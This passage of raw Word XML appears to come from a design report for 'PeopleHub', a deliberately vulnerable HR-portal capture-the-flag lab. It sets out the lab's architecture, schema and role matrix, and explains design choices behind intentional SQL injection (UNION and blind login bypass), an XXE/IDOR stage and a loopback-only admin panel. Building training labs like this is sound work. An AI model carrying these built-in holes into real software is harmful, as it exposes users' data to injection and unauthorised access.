              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>A workflow bug — an old, undocumented shortcut still works.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>You’ve already found a code elsewhere. Try it here.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>System architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Request lifecycle</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Browser</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v</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>server.js  (single vanilla http.createServer, no framework)</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 /api/login, /api/resume, /api/progress, /api/exhibit-*, ...   -&gt; outer CTF game (unchanged)</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 /api/peoplehub/*   -&gt; requires outer session with stage3=true</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  |                        -&gt; lib/peoplehub/router.js (handle)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  |                             -&gt; requires PeopleHub's OWN session (phsid cookie)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  |                             -&gt; routes/*.js handlers, RBAC-checked (lib/peoplehub/rbac.js)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  |                             -&gt; lib/peoplehub/db.js (one persistent sqlite connection)</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 /api/ctf-admin/*   -&gt; requires loopback connection only (no session of any kind)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  |                        -&gt; lib/peoplehub/router.js (handleAdmin)</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 everything else (incl. all /peoplehub/*.html) -&gt; static file serving (public/)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Directory map</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>server.js                        outer game + PeopleHub mount points</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lib/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  hrdb.js, xxe.js                outer game's Stage-4 XXE/IDOR lab (untouched, still live)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  peoplehub/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    db.js, session.js, rbac.js, helpers.js, challengeState.js, router.js</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    routes/  timepay.js  documents.js  requests.js  reports.js  recruitment.js  training.js</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">             comms.js    audit.js      admin.js     importxml.js  feedback.js  emergency.js</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seed/       config.js  data/  lib/rng.js  generators/  seed.js</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>db/         schema.sql, peoplehub.sqlite (generated)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>challenge-data/   XXE lab's synthetic filesystem (real files, read-only, on disk)</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public/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  index.html, map.html, exhibit-*.html, gate-*.html, hr-portal.html   (outer game, unchanged)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  ctf-admin.html                 dev-only reset/inspection panel (loopback-gated)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  peoplehub/  shared/ (api.js, shell.js, shell.css, table.js) + 23 page pairs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Database schema (relationships)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>departments --+-- employees &gt;---- manager_id (self-referential)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">             |        |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">             |        |--&lt; employee_profiles, payroll (1:1 each)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">             |        |--&lt; leave_records, performance_reviews, notifications, security_events</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">             |        |--&lt; documents (owner, nullable) --&lt; document_access &gt;-- roles</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">             |        |--&lt; hr_requests / it_tickets (assigned_to -&gt; employees)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">             |        |--&lt; training_enrollments &gt;-- training_courses</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">             |        |--&lt; emergency_access_requests (requested_by + 3 approver FKs)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">             |        \--&lt; interviews (interviewer_id -&gt; employees)</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 xml:space="preserve">             \--&lt; job_openings --&lt; applications &gt;-- candidates</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>users --&gt; roles (role_id), employees (employee_id, nullable)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>challenge_state          (session_key = outer game's session token, not an FK)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Role capability matrix</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1368"/>
            <w:shd w:val="clear" w:fill="123B78"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="605"/>
            <w:shd w:val="clear" w:fill="123B78"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>dir</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="605"/>
            <w:shd w:val="clear" w:fill="123B78"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>anyProf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="605"/>
            <w:shd w:val="clear" w:fill="123B78"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>team</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="605"/>
            <w:shd w:val="clear" w:fill="123B78"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>payroll</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="605"/>
            <w:shd w:val="clear" w:fill="123B78"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>reports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="605"/>
            <w:shd w:val="clear" w:fill="123B78"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>hrAdmin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="605"/>
            <w:shd w:val="clear" w:fill="123B78"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>itAdmin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="605"/>
            <w:shd w:val="clear" w:fill="123B78"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>recruit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="605"/>
            <w:shd w:val="clear" w:fill="123B78"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>audit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="605"/>
            <w:shd w:val="clear" w:fill="123B78"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>sec</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="605"/>
            <w:shd w:val="clear" w:fill="123B78"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="605"/>
            <w:shd w:val="clear" w:fill="123B78"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>emerg</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1368"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Employee</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Manager</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r>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1368"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>HR Helpdesk</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HR Manager</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r>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1368"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Recruiter</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Payroll</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IT Support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r>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1368"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Security</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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="605"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1368"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Administrator</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c>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="605"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Why a few things are built the way they are</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>One persistent sqlite connection, not per-request.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The original hr-portal.html lab rebuilt an in-memory database on every call — fine for a handful of rows, not at 1,000+ employees. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>lib/peoplehub/db.js</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> opens once and is reused; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>closeDb()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> lets </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/ctf-admin.html</w:t>
      </w:r>
      <w:r>
        <w:t>’s reset button hand the file back to the seed script without a server restart.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>List queries fetch everything and paginate in JS, for the vulnerable endpoints.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A separate </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>COUNT(*)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> query and a paginated </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> have </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>different column counts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — a UNION payload sized for one broke the other (a real bug, found and fixed — see Part III). Collapsing to one unbounded query, sliced in application code, fixed it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Discovery flags are content-based, not shape-based, where it matters.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQLite UNION always keeps the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>first</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SELECT’s column names — checking for the right column </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>names</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in a result row can never detect a UNION injection. Reports and HR Requests check actual </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>values</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> instead.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Seed insertion order controls the login bypass’s blast radius.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>LIMIT 1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with no </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ORDER BY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> returns whichever row SQLite encounters first. Employee/Manager seats are seeded before Administrator ones so a five-second blind payload doesn’t also happen to be the fastest way to full admin.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Part III — Project Timeline &amp; Task Log</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Every task in this engagement, in order: what was asked, what was found, what was delivered.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3408"/>
        <w:gridCol w:w="3408"/>
        <w:gridCol w:w="3408"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="504"/>
            <w:shd w:val="clear" w:fill="123B78"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
